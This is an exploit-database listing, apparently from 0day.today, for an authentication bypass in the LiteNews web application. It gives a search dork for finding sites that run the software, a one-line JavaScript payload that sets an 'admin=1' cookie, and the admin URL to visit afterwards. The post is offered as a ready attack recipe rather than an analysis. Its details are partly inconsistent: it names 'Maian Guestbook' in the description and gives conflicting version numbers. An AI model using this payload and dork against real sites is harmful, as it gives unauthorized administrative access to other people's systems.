[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LiteNews <= 0.1 Insecure Cookie Handling Vulnerability

Author
Scary-Boys
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3507
Category
web applications
Date add
04-08-2008
Platform
unsorted
======================================================
LiteNews <= 0.1 Insecure Cookie Handling Vulnerability
======================================================


#########################################################################
#                                                                       #
#         litenews-01 <= 1.2 Insecure Cookie Handling Vulnerability     #
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys						#
# HOME       : http://scary-boys.com					#
# Download   : http://webscripts.softpedia.com/scriptDownload/LiteNews-Download-43228.html#download_locations
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By litenews"         			        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                        		#
#  Maian Guestbook suffers from a insecure cookie                       #
# the admin panel only checks if the cookie exists. 		        #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "admin=1; path=/";                      #
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin/index.php" & Refresh      #
#                                                                       #
#########################################################################



#  0day.today [2024-12-24]  #